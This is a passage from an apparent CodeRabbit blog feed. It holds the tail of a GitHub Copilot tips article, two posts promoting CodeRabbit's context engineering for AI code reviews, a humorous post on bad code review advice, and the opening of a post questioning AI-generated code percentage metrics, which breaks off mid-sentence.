if it’s not quite right. A GitHub Copilot tip that’s helped me is to use the keyboard shortcuts (or the Copilot panel) to cycle through alternative suggestions. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/6adb2fdd7405325531f0bbf05c94671889fda236cbd7424fa2152ca6316016c0_0a99926881.png) There might be a gem in suggestion #2 or #3 that better fits your needs than suggestion #1. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/ed9da2cbf10ae6d75d67a93ef0c89001baa0f2ee83cbee5f7009f5b58ef78d88_91e4c976d3.png) Additionally, you can open the Copilot sidebar (or the full chat interface, if available) to explicitly ask for more options. In some IDE setups, hitting a special shortcut (like Ctrl+Enter in VS Code with Copilot Chat enabled) will even reveal multiple completions at once. Scanning through a few options can save you time you’d otherwise spend editing a less ideal suggestion. It’s like getting a second and third opinion from the AI. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/18222f10fff1de734f784123468789868f2be6fe91890dd1f2b95d92689535db_2c7604be88.png) If none of the suggestions look good, that’s a signal to refine your prompt or add more context. Perhaps your comment was too short or ambiguous. Try rephrasing it or adding another detail and then trigger Copilot again. The model’s output can vary greatly with slight changes in how you ask. For instance, if the **#sort list** didn’t give the desired result, then **#sort the list of names in alphabetical order** might produce a better suggestion. Another trick is giving feedback to Copilot. If you’re using Copilot Chat or the sidebar, you might have thumbs-up/down buttons you can press to give feedback on suggestions. While this won’t instantly change the current suggestion, it does send feedback to improve the model’s future behavior through reinforcement learning. And in chat mode, you can directly say, “No, that’s not what I meant. I actually want X,” and the AI will try again. ## **GitHub Copilot tip 10:** Review, test, and verify Copilot’s output Copilot can generate code that looks perfect at first glance, but remember, it’s not guaranteed to be 100% correct or optimal. Always review and test the suggestions before integrating them into your codebase. This tip cannot be stressed enough. Copilot may introduce bugs, security issues, or logically wrong code if the prompt is misunderstood. You, the developer, are the last line of defense to ensure quality. To review Copilot’s output, first, read the code carefully and make sure you understand it. If Copilot suggests a complex algorithm or some math you’re unsure about, ask Copilot (via Chat) or use your knowledge to break down what it’s doing. You can ask Copilot Chat to explain the suggested code in plain language as a helpful Copilot trick. Often, I’ll paste a large suggestion into the chat and prompt: “Explain what this code does.” You can immediately catch any assumptions or errors if the explanation reveals any assumptions or errors. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/986ce869b9c8d3b49316a84b18aed345bd7235e8365daaaaf514c406759812da_1ba06d426e.png) Next, consider edge cases and correctness. * Does the code handle empty inputs? * What about error conditions? * If something looks fishy (like a potential off-by-one error or an unbounded recursion), address it or prompt Copilot to fix it. Security and style are also important. If your prompt didn't specify otherwise, Copilot might use a deprecated function or an insecure approach. Always double-check things like SQL queries (are they parameterized to prevent injection?), file operations (are files closed properly?), and any cryptography or authentication code it writes (does it follow best practices?). **Linting and static analysis tools are your friends here**. Run your linters or code formatters on Copilot’s code to catch style issues, and use any security scanners (like Snyk or CodeQL) if applicable to flag vulnerabilities. Finally, remember that Copilot might occasionally produce code that is oddly similar to public examples (especially for very common algorithms). It’s rare, but if you’re working on a closed-source project and have strict license requirements, be mindful of this. You can configure Copilot to avoid suggestions that match public code, if needed. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/c39c534a2d3c6ce4958483656ce33377ef27534ab003a84fc5558bf1c0d00078_27b05691ff.png) ## Now, it’s time to use these hot tips for GitHub Copilot! GitHub Copilot is a game-changer for developers but like any powerful tool, it yields the best results when used skillfully. We’ve covered our top 10 hot tips for GitHub Copilot – from crafting great prompts and leveraging context to integrating Copilot with an AI reviewer like CodeRabbit. By implementing these GitHub Copilot best practices, you’ll find Copilot becomes much more helpful. It can handle the boilerplate and suggest clever solutions, allowing you to focus on higher-level thinking and problem-solving. Also, don’t forget that Copilot and the [surrounding AI ecosystem](https://www.coderabbit.ai/blog/2025-the-year-of-the-ai-dev-tool-tech-stack) are evolving rapidly and new features (like the CLI tool, vision-based Copilot, etc.) are coming out regularly. Stay curious and keep experimenting with how you use it. Perhaps you’ll discover new GitHub Copilot tips and tricks beyond the ten we’ve shared. Or we’ll just write another article. ***Interested in using CodeRabbit with Copilot? Start your*** [***free 14-day trial.***](https://coderabbit.link/ZboRIZI)

Context Engineering: Level up your AI Code Reviews

Sahil Mohan Bansal — Thu, 17 Jul 2025 00:00:00 GMT

## Context is everything – especially in code reviews At CodeRabbit, we have engineered the most context-rich code reviews in the industry. While other code review tools might skim the surface and settle for just “codebase awareness,” we go deeper. We pull in dozens of data points from your codebase to deliver reviews that are accurate and actually helpful. We do this by packing a 1:1 ratio of code-to-context in our LLM prompts. For every line of code under review, we’re feeding the LLMs an equal weight of surrounding context. That includes key things like user intent, file dependencies, and expected outcome gathered from sources such as Jira tickets, code graph, past PRs, learnings from chat conversations, Linters, and more. And we don’t stop there. Every suggestion from our AI is verified post-generation to reduce hallucinations, ensure accuracy, and match it to your code reviews guidelines before it ever reaches your PR. This is context engineering – and it’s why CodeRabbit’s reviews lead the industry when it comes to relevance, quality, and trust. In this post, we’ll look at some of the most critical data points that go into CodeRabbit’s Context Engineering approach. [![CodeRabbit architecture](https://victorious-bubble-f69a016683.media.strapiapp.com/92e3f84c089db9dcfd647dbc39a11449a9ce3a945ed143635db1dcfad0451e18_ad1e34c9b7.png)](https://coderabbit.ai/) ## PR and Issue Indexing Every code review starts with CodeRabbit cloning your repo and keeping it in a sandbox. This ensures that all reviews are completely codebase aware and the code is kept secure in an isolated environment. CodeRabbit analyzes your codebase to understand the existing file relationships, code dependencies, project structure, and patterns across your codebase. To learn more about how CodeRabbit uses GCP Cloud Run Sandboxes, check out this [GCP blog](https://cloud.google.com/blog/products/ai-machine-learning/how-coderabbit-built-its-ai-code-review-agent-with-google-cloud-run). CodeRabbit also looks at your past PRs to gather additional context including PR titles, descriptions, and affected commit ranges so that it can get more information about the "why" behind code changes. Any previous related PRs are included in the review comments. By better understanding the “why” behind code changes being reviewed, CodeRabbit generates more context-aware AI code reviews. Additionally, we also index your issues (Jira, Linear, Github and Gitlab Issues) to understand the “intent” behind code changes. Any issue tickets attached to your PR are analyzed and an assessment of the code changes in the PR against the requirements in the linked issues is automatically generated. This helps us understand if the asks in the issue ticket is adequately addressed by the PR. [![CodeRabbit assesses linked issues](https://victorious-bubble-f69a016683.media.strapiapp.com/399c6f5fd5fd005a6a507bdbd5be31cea3ccc9b552f7577dcac9a0ec055b51a1_5f79790c15.png)](https://docs.coderabbit.ai/reference/configuration#assess-linked-issues) ## Code Graph Analysis Every time a new review is triggered, CodeRabbit builds a graph representation of code dependencies. These are re-generated each time to make sure no new dependencies are missed. Understanding how various functions depend on each other across the codebase is critical to identifying any downstream conflicts that may cause breaking changes. CodeRabbit analyzes definitions of code symbols (e.g. Types) from this code graph and uses those definitions to enhance context when providing review comments. This helps catch more edge cases and breaking dependencies that could otherwise be missed. You can see the code definitions that were used in the review comment. [![CodeRabbit code graph analysis](https://victorious-bubble-f69a016683.media.strapiapp.com/6fe1be8c6be4feda5760acd5262ec3c3f9f1fd0cb58fbbae5c17af219871a2f8_433ebf4fdb.png)](https://docs.coderabbit.ai/integrations/code-graph-analysis/) ## Custom Review Instructions CodeRabbit includes custom review instructions specific to each team’s coding standards. Reviewing your code according to your own custom rules is a critical component of any intelligent code review and CodeRabbit provides a lot of flexibility in terms of how you can provide custom code review instructions: * [Path-based filters](https://docs.coderabbit.ai/guides/initial-configuration/?#filters): These are helpful to reduce the number of files and speed up the code review. Provide the file path in the form of a glob pattern and CodeRabbit will exclude those files from review, or provide an inverse blog pattern if you only want those files reviewed. * [Path-based instructions](https://docs.coderabbit.ai/guides/initial-configuration/?#review-path): These are custom review instructions that only apply to files that match the provided glob pattern. Both path filters and instructions are highly deterministic and will kick in when the pattern matches. These are useful to include when you want certain review rules to only apply to some functions. * [Coding agent guidelines](https://docs.coderabbit.ai/integrations/knowledge-base/?#code_guidelines): If you already have your coding guidelines set up in an AI coding agent (Cursor, Copilot, Cline, Windsurf, etc.) then CodeRabbit can import them and use those existing rules in its code reviews. Just provide the rules file path and we will import the code guidelines. [Learnings from chat](https://docs.coderabbit.ai/integrations/knowledge-base/?#learnings): This is a simple and intuitive way to provide feedback on review comments. Don’t like something in the review? Just chat with CodeRabbit and tell it you don’t want those kinds of comments or you would like it to analyze similar issues through a specific lens and it will include your chat feedback in future code reviews. [![CodeRabbit learnings from chat](https://victorious-bubble-f69a016683.media.strapiapp.com/81f1d46f3d51b0dd802eb7bf60497529ff3134f3c9733aab00f6dd26702124ef_3e7f3bcc2b.png)](https://docs.coderabbit.ai/integrations/knowledge-base/?#learnings) ## Linters and Static Analyzers CodeRabbit packages 40+ Linters/SAST tools with zero-touch configuration needed from the user. While most customers may have some Linters pre-configured, we provide a much more comprehensive set of Linters. These Tools are automatically invoked during the code review process and their results are validated by our verification agent to cut down on the noise that’s often typical of Linters. A more exhaustive list of Linters helps catch more bugs. We check your code by running it through all of the 40+ supported Linters that are relevant to the code in question.. If you prefer to use your config file and the tool supports a custom config file, then you can provide the file path for your config file and we will use the rules from your config file in code reviews. When a bug is caught because of a Linter, you will see that called out in the review comment. You can check out the full list of [supported Linters](https://docs.coderabbit.ai/tools/list/) in our documentation. [![CodeRabbit Linters](https://victorious-bubble-f69a016683.media.strapiapp.com/48fd056e6089a50e51592bb702fb3a7afa0346a0552aacaaa3604eba55eb1686_36e7df53ea.png)](https://docs.coderabbit.ai/tools/list/) ## Web Query Sometimes the underlying LLM used in reviews may not be up to date to review the code accurately. For example: the LLM may not be aware of a latest security update or a new patch release for a particular programming language. In those cases, CodeRabbit will run a real-time web query to fetch technical information from publicly available release notes or technical documentation and include that in the code review. This helps ensure your code review includes the latest info and doesn’t accidentally flag errors due to outdated info. In the example below, the code was referencing Go version 1.23.6, and the LLM was not aware of a newer version, but CodeRabbit was able to run a Web Query and figure out that actually the latest Go version is 1.24.1 and recommended the user to refer to the latest Go release. [![CodeRabbit web query](https://victorious-bubble-f69a016683.media.strapiapp.com/2c1f9cc518af0cd95d037aca66fc7c8fec790108e84f6497292dab37c0f4d61a_6891b97224.png)](https://docs.coderabbit.ai/guides/agent_chat/?#web-search) ## Verification Scripts Lastly, CodeRabbit also runs verification scripts on the review comments provided by the LLMs to make sure that the review comments will meaningfully improve the codebase. These verification scripts are generated in the sandbox and any low value feedback is automatically filtered out and not passed on to the user, helping filter out most of the AI hallucinations that can sometimes occur. [![CodeRabbit verification script](https://victorious-bubble-f69a016683.media.strapiapp.com/5b718c02cb1247cf333c00d0651c6f66af23452038573d7a697ff884758552b3_63ba61125f.png)](https://docs.coderabbit.ai/guides/code-review-overview/) ## Industry leading context engineering for better code reviews As you can see, CodeRabbit has an extensive Context Engineering approach that ultimately provides more accurate code reviews by giving LLMs just the right amount of contextual information to catch more bugs without overwhelming them. We achieve this by: * Understanding the intent behind code changes to catch otherwise hard to find bugs * Feeding the right amount of information to LLMs with a 1:1 ratio of code to context * Filtering out low value review comments to maintain a high signal to noise ratio If you’d like to give CodeRabbit a try, we offer a [free 14-day trial](https://app.coderabbit.ai/login?free-trial) and it only takes a couple of minutes to give access to your repo. Let us know if you have any questions [on Discord](https://discord.gg/coderabbit)!

Good code review advice doesn't come from threads with 🚀 in them

Emily Lint — Wed, 16 Jul 2025 00:00:00 GMT

Code reviews used to be a quiet, dignified affair—an async ritual where you thoughtfully (or passive aggressively) gave feedback and occasionally dropped a “nit: maybe rename this var?” comment to feel alive. But then social media got involved. Now, developers are sharing hot takes about code reviews, many of which sound like they were written by someone who’s never met another human being. In one corner, we have Twitter influencers claiming you should “just merge it and fix it later” because iteration (and downtime) is life, apparently? In another, LinkedIn grindset bros are insisting that *real* devs don’t need code reviews because “you should trust your team.” And then there’s the advice that seems like trauma disguised as tradition: “Our team just roasts each other’s code live on Fridays. It builds character.” Or: “We only do in-person code reviews, it keeps people honest.” Translation: we’ve replaced the comments section with live humiliation. Bold strategy. To illustrate the impact of influencers on development cycles, we created a comic. *The Battle of the Bathrobe Influencers* playfully pokes fun at some of our favorite influencers and how many different code review takes there are on the timeline right now and how that might affect individual developers if teams actually listened to and followed all the competing takes. ***No influencers were harmed in the making of this comic… we hope.*** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/0f82bcff4d9ed22ee2d3ffba7110e0f06faf5f4b443c4e040b329ab9d400e874_d8260dfd02.png) At CodeRabbit, we love a good code review etiquette debate but we also like shipping code *and* keeping our coworkers emotionally intact. So, we’ve put together a list of some code review bad takes we’ve seen floating around the timeline—and what to do instead if you don’t want your team quietly scheming your removal from the repo. ## Bad code review trend #1: The “Just merge it” mentality ![](https://victorious-bubble-f69a016683.media.strapiapp.com/024b59e73bb379a4adb3d59ff6d642ef342c9f8c876ec4122a50d6597ae3272a_596583ad77.png) If you've ever seen a pull request titled “WIP – just gonna merge this for now,” you’ve met a ‘Just merge it” dev. They’re disciples of the “move fast and break literally everything” school of development. They believe in shipping code quickly no matter how bad is a strength and fixing things later is part of the agile lifestyle. But here’s what actually happens when you merge bad code to “fix later”: you don’t fix it later. No one does. It goes to production. It breaks. Now your teammate is debugging a mystery bug on a Sunday night and slowly whispering your name like it’s part of a ritual curse. If you’re trying to speed things up, here’s a radical idea that’s better than just merging it: review your own code before you ask someone else to. Give it a read with fresh eyes. Clean up nonsense logic, remove dead code, and maybe run it through an [AI reviewer like CodeRabbit *in your IDE*](https://coderabbit.link/zZ3nEO6) so you don’t miss something humiliating (like importing a library you’re not even using. Again). ## Bad code review trend #2: “Code reviews are for juniors” ![](https://victorious-bubble-f69a016683.media.strapiapp.com/2c375ccd9de1621e32eb40bed747d5bb0902c7e38a4b777d2347037112879654_ee6b5db713.png) Another fun trend: the belief that once you hit “Staff Engineer IV (Ascended Form),” code reviews are beneath you. You’ve achieved such enlightenment that no mortal can possibly understand your code. This mindset turns senior devs into unreviewable wizards who vanish into architectural side quests and return weeks later with 2,000-line PRs and the words “don’t worry, I tested it.” Here’s the truth: the more senior you are, the *more* important it is to have your code reviewed. Not because you don’t know what you’re doing but because your work is more impactful, more complex, and more likely to become the terrifying foundation for everything built after it. If that code is flawed, future developers will suffer. Plus, code reviews are a two-way street. Senior engineers can model how to give constructive feedback, share architectural context, and mentor others by writing thoughtful comments. They can also learn from junior devs who ask great questions or spot something weird because they’re not desensitized to your obscure variable naming scheme yet. So, don’t skip reviews. Normalize them at every level. ## Bad code review trend #3: “Nitpicks are toxic” ![](https://victorious-bubble-f69a016683.media.strapiapp.com/cc7e8ca0a492f51bf0aa5bb6445e778421020b0436668ebb69c9ab9da599fcdf_7d2a90fb66.png) There’s a growing movement online that says nitpicky comments in code reviews are basically microaggressions. That if you suggest someone rename a variable or break up a 30-line function, you’re stifling creativity and slowing down development for no good reason. Look, we get it. No one wants to receive 14 comments about whitespace and whether it’s “utils” or “helpers.” But not all nitpicks are created equal. The truth is, a lot of “tiny” things in code aren’t actually tiny. They’re death by a thousand readability cuts. Codebases rot from the inside out when no one sweeps up the small stuff. Confusing names, inconsistent structure, or one-off edge case handling eventually add up to a debugging experience best described as “psychological horror.” That said, nit-level feedback shouldn’t feel like an attack. The goal isn’t to flex your encyclopedic knowledge of the company style guide—it’s to help your teammate write code the next person (and the next-next person) can understand. You can do that without sounding like a passive-aggressive linter. Start by offloading the basics to, well… actual linters. CodeRabbit, for example, comes with [30+ linters built in](https://docs.coderabbit.ai/tools/list), so you don’t have to waste brain cells correcting indentation or lecturing someone about semicolons. That frees you up to focus on logic, clarity, and architecture—things humans are best at. ## Bad code review trend #4: Frequently turning code reviews into a performance (aka the live review trap) ![](https://victorious-bubble-f69a016683.media.strapiapp.com/a817c10335e0670190a8ceaeabd9cd1f1f0aea362403eb0334fe75b7c0e0a1b0_45d0c67756.png) You know what’s great about pull requests? You can review them in sweatpants at 10pm, covered in crumbs, muttering to yourself in peace if you want. You know what’s *not* great? Being called into a surprise Zoom meeting where your manager shares their screen and says, “Let’s walk through your code together... as a team.” Live code reviews are the latest workplace horror disguised as collaboration and “context sharing.” And sometimes they are! But often they’re just a weird hybrid of interrogation and performance art. You sit there while someone scrolls through your functions like they’re auctioning off your dignity and other devs chime in with helpful thoughts like, “Yeah, I had questions about that, too.” These sessions are especially rough for junior devs, introverts, or literally anyone who doesn’t enjoy public code autopsies. They discourage honest feedback (because who wants to be the one to say “this is confusing” in front of the CTO?) and eat up everyone’s calendars. What could’ve been solved with three async comments now requires a 45-minute meeting and an existential crisis. There *is* a place for live code reviews—but it’s not “every sprint, all the time.” Use them intentionally: for onboarding, gnarly architectural changes, or postmortems. And if you’re going to do one, give people a heads up. ## Bad code review trend #5: Not reading through your AI-code first ![](https://victorious-bubble-f69a016683.media.strapiapp.com/4b048e721c7211925a9963bc80598910090a3626444ce38d23aafc6ff135974d_d0684a3ec6.png) As if things weren’t chaotic enough in development, we now have AI entering the scene like a caffeinated intern who *means well* but keeps hallucinating entire modules. AI coding tools are powerful – but also deeply chaotic. They’ll give you working code *and* sprinkle in a few imaginary functions for flavor. We’ve seen it all: five-thousand-line PRs with variables named foo7, random timeouts, and logic that reads like someone asked ChatGPT to explain taxes using only metaphors. Sometimes it even compiles! But that doesn’t mean your AI sidekick didn’t also sneak in a few logic bugs, duplicate code blocks, or functions that only make sense if you’re a large language model yourself. AI tools are here to help – not replace critical thinking. If your workflow is “vibe prompt, commit code, start lunch,” then yes: you’re part of the problem. Review what your AI assistant wrote. Refactor. Sanity check. And for the love of merge conflicts, run a local AI review before unleashing it on your team. CodeRabbit’s [AI reviewer in your IDE](https://coderabbit.link/zZ3nEO6) can catch a lot of issues before your teammates have to. It’s like having a robot tell you your fly’s down before you walk into a meeting – deeply appreciated and MUCH less awkward than your boss doing it. ## Code review etiquette: How to be a code reviewer people want to work with Let’s say you’ve made it through this blog post without recognizing yourself in any of these horror stories. You win! Now, let’s level up: how do you become the kind of reviewer people *actually like* getting feedback from? * Start by being human. Leave thoughtful comments that explain the *why*, not just the what. * Ask questions when something’s unclear instead of assuming malice or incompetence. * If something’s genuinely clever or elegant? Say so! A simple “nice work” in a PR can be a game-changer—especially when the rest of the comments feel like homework corrections. * It also helps to not sound like a compiler error in human skin. Use a friendly tone. Emojis are fine in moderation (a well-placed 👀 or 🎉 goes a long way). * You can even sprinkle in a bit of humor, assuming your teammate isn’t currently crying over merge conflicts – or maybe because they are and you want to make them laugh. The golden rule of code review etiquette is simple: give the kind of feedback you’d want to receive. And maybe don’t reply to every comment with a Notion doc defending your variable naming philosophy. Life’s too short. *Want an AI reviewer that won’t give bad advice? Try* [*CodeRabbit in your IDE and git-platform.*](https://coderabbit.link/WvkI4n6)

The art and science of context engineering for AI code reviews

Amitosh Swain — Wed, 16 Jul 2025 00:00:00 GMT

The difference between a mediocre and exceptional AI agent comes down to one thing: *context*. Context engineering has recently become a buzzword. In late June, [Shopify CEO Tobi Lutke](https://x.com/tobi/status/1935533422589399127) tweeted about it and [Andrej Karpathy](https://x.com/karpathy/status/1937902205765607626) chimed in to point out that good context engineering is what sets AI apps apart. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/c46b3383ae52494b4faf8a4d826df89eae2ddeb1f4d7dbac1a6451cb67c4ed2d_42dbf840ae.jpg) CodeRabbit is a great example of the difference context makes. Every day, we perform tens of thousands of code reviews — either on our users’ pull requests or in their IDEs. Each review comment that CodeRabbit makes is the result of a carefully engineered non-linear review pipeline that pulls in contextual data, related to code being reviewed, from dozens of sources and then runs verification agents to check again that every suggestion we share makes sense within the context of both the PR we’re reviewing and the greater codebase. Context engineering is the difference between an AI code review tool that merely pattern-matches against generic coding standards and one that deeply understands your project's specific architecture, patterns, and goals – and can actually add value to your code review. ## The nature of context engineering in code reviews ![](https://victorious-bubble-f69a016683.media.strapiapp.com/01fdb35154b77aea142483a82692c09e81f357087831d21119046c4093f57abc_995bd2a921.png) We break down the context in which CodeRabbit operates into three distinct parts: 1. **Intent**: What the developer or team aims to achieve with the code changes, including the purpose of a pull request, the problems they are trying to solve, and the intended outcomes. 2. **Environment**: The current technical state of the system, including file relationships, code dependencies, project structure, and existing patterns. 3. **Conversation:** The rest of the regular stuff that goes into a multi-turn LLM call, i.e., your chat messages, tool call responses, etc. When these elements are appropriately balanced and presented to an AI system, the result is an intelligent code reviewer that catches not just syntactic issues but also architectural inconsistencies, potential performance bottlenecks and opportunities for higher-level design improvements. ## Finding the context engineering sweet spot ![](https://victorious-bubble-f69a016683.media.strapiapp.com/1eb15da2ebd4622aaa859e32269774edad69adfc7e401aa23a81934e50757875_84c64a0946.png) Creating the proper context for AI-powered code review involves navigating several challenges. Here are three challenges that make context engineering particularly difficult. ### 1\. The Goldilocks problem for AI agents * **Too little context** leads to "hallucinations"—where the AI makes assumptions about missing information, often incorrectly. * **Too much irrelevant context** dilutes the signal, causing the AI to focus on unimportant aspects or become overwhelmed with information. * **Just the proper context** provides precisely what the AI Agent needs for accurate insights without *noise*. ### 2\. Token-by-token processing Unlike humans, who can quickly scan a document and mentally prioritise important sections, AI models process information token-by-token, giving equal weight to each piece of text. If we put all the code changes from a PR in the prompt, the AI may latch on to something insignificant and skip major issues. Curating the context is important. You need to prioritise important changes and discard the unimportant ones. ### 3\. Context window limitations Even the most advanced AI models have finite context windows, the maximum amount of text they can process at once. This limitation makes strategic context selection critical, especially for large codebases or complex pull requests. ## The CodeRabbit approach to context engineering ![](https://victorious-bubble-f69a016683.media.strapiapp.com/c16f4450b93d35e7b35aafcbe477187abee5119d0f5f985fb1133d5e8360a3cc_bab2745cad.png) At CodeRabbit, we've developed a multi-layered approach to context preparation that addresses these challenges and delivers consistently high-quality code reviews. Our system employs a sophisticated, non-linear pipeline designed to gather, filter, and structure context in ways that maximise AI comprehension. The diagram above lists just some of the dozens of sources of context we draw on in our context preparation process. ### Intelligent repository and PR information collection ![](https://victorious-bubble-f69a016683.media.strapiapp.com/ffacb1ad99374b29a226cf2550118e05fafb6f6a60e927535bd95c65b0137ba5_090100f62a.png) Our context preparation begins with extracting the most relevant information about the pull request itself: * **Metadata**: We collect essential data like PR title, description, and affected commit range to determine the "why" behind code changes. * **Differential analysis**: For incremental reviews, we calculate exact changes since the last review, ensuring the agent focuses only on what's new or modified. * **Path filtering**: Our system distinguishes between meaningful code changes and [ancillary files](https://docs.coderabbit.ai/guides/review-instructions/#default-blocked-paths) (like generated assets or dependencies), focusing the AI's attention on what truly matters. ### Knowledge integration from multiple sources ![](https://victorious-bubble-f69a016683.media.strapiapp.com/184539d85d7668c1aeb0ec36654d0fcafbbeb7d4444cafe0d017f904e6167e21_6f64a8f6a5.png) A great code review requires more than examining the current changes in isolation. Next, we work on understanding the broader technical and business context: * **Historical learnings**: We employ a vector database to store our agent’s learnings from past reviews, allowing the system to recall relevant feedback patterns and user preferences so it can structure review comments with these in mind. * **PR intent analysis**: We analyse PR descriptions and related issues to extract the underlying objectives of changes, ensuring CodeRabbit's review aligns with developer goals. * **Code Graph Analysis**: We then construct a graph representation of code dependencies to help the AI understand how files interrelate, enabling reviews that consider architectural impact. ### Strategic context assembly ![](https://victorious-bubble-f69a016683.media.strapiapp.com/9587da529f6165278bb96e1ace81eba4d0f602a5c489cd3aec003cbf96b3bdaf_faaa76151d.png) Once we have gathered all the raw information required for reviewing, we optimize how the prompt is packaged for the AI agent. ### Prompt engineering ![](https://victorious-bubble-f69a016683.media.strapiapp.com/ff8c9119531afb00d17cb1ea2e79677b5dbb736018260b1cf03812f5bd3e26fe_2a0e6c99dd.png) The next stage of our review pipeline involves crafting the perfect instructions for the AI. We average a 1:1 ratio of code to context in our prompts which shows how important context is: * **Level-appropriate prompts**: We adjust the review depth based on file complexity and importance, ranging from basic checks to in-depth architectural analysis. For different complexity levels, we use different prompts and models. * **Structured review guidelines**: Clear instructions help the AI Agent focus on the most valuable types of feedback for each specific situation based on our own historical data on helpful review comments * **Context Enrichment**: The prompts include relevant project coding standards, patterns, and historical insights that guide the AI toward company-specific best practices. * **Context Selection**: We perform a final pass of the context with results of the previous agents, which did the context preparation to cut noise. ### Verification agents ![](https://victorious-bubble-f69a016683.media.strapiapp.com/92e8bb9edf6f2c2bf1c446f369f46c4e5c9abc10eb089433a20da5dd60e86572_86698a4754.png) The final target of our review process is our verification system which is an AI-powered quality assurance layer that automatically validates and improves review comments. It’s activated when the AI reviewer needs to double-check its findings. ## Impact of context engineering on review quality ![](https://victorious-bubble-f69a016683.media.strapiapp.com/512763d825788bbfd2e740dced1618137418b685dc43f4369459dbde3b74b2c2_d66829bbdb.png) The sophistication of our context engineering preparation pipeline directly translates to tangible benefits in review quality, including: ### Reduced false positives By providing the AI with the proper context, we dramatically reduce irrelevant or incorrect suggestions that waste developer time like, for example, changes to function calls that don’t align with the team’s coding standards. The system understands project-specific conventions and avoids flagging intentional patterns as issues. ### Deeper architectural insights With more knowledge of code relationships and project structure, CodeRabbit can identify architectural issues that simple linting tools or pattern matching will miss. For example, many of our customers recount how CodeRabbit is able to flag when changes in a PR will affect other dependencies in their codebase. ### Consistent application of best practices By incorporating historical learnings and team-specific knowledge, we consistently apply coding standards and best practices across all reviews. We continue to make it easier for teams to share their coding guidelines – including recently enabling the ability to [import coding guidelines](https://www.coderabbit.ai/blog/code-guidelines-bring-your-coding-rules-to-coderabbit?) from your favorite coding agent. ### Enhanced learning over time Our approach enables the system to improve with each review, building a growing knowledge base of project-specific insights that make future reviews even more valuable. ## The importance of good context engineering Context is not merely a technical requirement for LLMs, but a requirement for effective AI Agents. By thoughtfully gathering, filtering, structuring, and presenting the context, CodeRabbit doesn't just review code. Instead, it understands code in its full complexity so that it can provide insights that make developers more productive, code more robust, and teams more effective. This is increasingly important as AI coding agents currently tend to generate a significant amount of AI slop. This is only the beginning of context engineering for AI code reviews – we are always refining our approach to improve review quality. With model capabilities constantly expanding, in the future, we’ll be able to do much more. ***Interested in seeing how context makes a difference in our code reviews?*** [***Start your 14-day trial!.***](https://coderabbit.link/fOmVdcW)

What percentage of your code should be AI-generated?

Sahil Mohan Bansal — Tue, 08 Jul 2025 00:00:00 GMT

We’ll come clean: That title is mostly clickbait. This isn’t an article where we tell you that 20% or 30% or even 50% of your codebase ***should*** be AI-generated. We’re writing this because it’s looking like very soon ***someone*** could be telling you that. Maybe your boss. Or your C-suite. In April, both [Google](https://shivammore.medium.com/ai-is-writing-over-30-of-googles-code-539e46e0b8c0) and [Microsoft](https://techcrunch.com/2025/04/29/microsoft-ceo-says-up-to-30-of-the-companys-code-was-written-by-ai/) came out publicly with claims that up to 30% of their new or existing code was AI-generated. What’s interesting is that both Microsoft and Google decided to quantify their AI usage in similar percentages during the same month. Even more notable is where they made these claims. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/790a4addfdc8fc7ad3bcaa27c01b79e22ffc1e8ff232474a38364516b7f8b0a3_9b66d7f6ff.png) Google’s Sundar Pichai shared that stat in an earnings call – and this wasn’t the first time he talked about AI-generated code at Google in this way. During Google’s November 2024 earnings call, Pichai stated that [25% of Google’s new code](https://www.forbes.com/sites/jackkelly/2024/11/01/ai-code-and-the-future-of-software-engineers/) was AI-generated. So, he explicitly framed it as an update for investors on Google’s progress at implementing AI. Not to be outdone, Microsoft’s Satya Nadella came out a few days later during a fireside chat with Mark Zuckerberg at LlamaCon with the claim that [20% to 30% of Microsoft’s codebase](https://www.cnbc.com/2025/04/29/satya-nadella-says-as-much-as-30percent-of-microsoft-code-is-written-by-ai.html) was AI-generated. What we likely saw in those two updates was the birth of a new metric that investors and executives will believe says something important about the state or future of a business. But what does a percentage like that *really* say? And, if it’s going to be used more widely as a way to measure AI adoption or a business’ competitiveness, how would companies and developers even decide what the ‘right’ percentage looks like? ## AI vanity metrics are the darlings of investors and execs ![](https://victorious-bubble-f69a016683.media.strapiapp.com/8086b45094308d0c29c1a932f0bb4da1839b30e9f7c7978ab5cbb9ecf477dee9_edf0858842.png) If you wondered why so many publicly traded companies rushed in 2023 and 2024 to share their ‘AI strategy,’ it’s because the stock market rewarded them for it. With investors projecting both revenue increases and cost savings from adopting AI, the stock prices of companies who [announced an AI strategy](https://www.wallstreetzen.com/blog/ai-mention-moves-stock-prices-2023/#:~:text=1) increased by 2% more on average than companies that didn’t. But 67% of companies had even better results – their stock prices soared over 6% higher. BuzzFeed’s stock even went up a [whopping 120%](https://mediagazer.com/230126/p10#:~:text=BuzzFeed%20stock%20jumped%20120,some%20of%20its%20content%20creation) just for announcing they planned to use generative AI to create content. Companies that didn’t articulate their AI strategy were generally punished in publicly traded markets. AI adoption has since become a key priority for Executives – both for the actual business benefits it promises AND for the stock price increases they now rely on whenever they announce new AI investments or adoption. That’s leading to what some have characterized as a toxic culture in some companies where all AI adoption is counted as good AI adoption because it makes investors and executives happy – and gives the veneer of increased productivity and velocity. In April, [Lead Dev wrote](https://leaddev.com/culture/ai-coding-mandates-are-driving-developers-to-the-brink) about how companies are now instituting AI coding mandates and how that’s – in their words – “driving developers to the brink.” These mandates can be anything from the request to increase the number of suggestions you accept from AI coding agents to public leaderboards ranking AI usage by employee to vague performance-based OKRs where devs are simply expected to use AI ‘more’ from quarter to quarter. The problem? Like many metrics, they’re blunt ways to measure and incentivize behaviors that have complex outcomes. This is demonstrated in the comments of a [Reddit post](https://www.reddit.com/r/ExperiencedDevs/comments/1j7aqsx/ai_coding_mandates_at_work/) the Lead Dev article links to. Says one dev: “At our monthly engineering all hands, they give us a report on our org’s usage of Copilot (which has slowly been increasing) and tell us that we need to be using it more. Then, a few slides later we see that our severe incidents are also increasing.” It’s clear there’s a disconnect between engineers and executives on the benefits of AI coding tool use. An [Atlassian survey](https://www.atlassian.com/software/compass/resources/state-of-developer-2024) of over 2,000 IT managers and developers in 2024 showed that leaders listed AI as the most important factor in improving developer productivity and satisfaction but only a third of developers reported experiencing AI-related productivity gains. By only measuring AI use and not the quality of the code that AI generates or the actual time saved once debugging and more involved code reviews are factored in, you could be incentivizing AI use even when AI use hurts 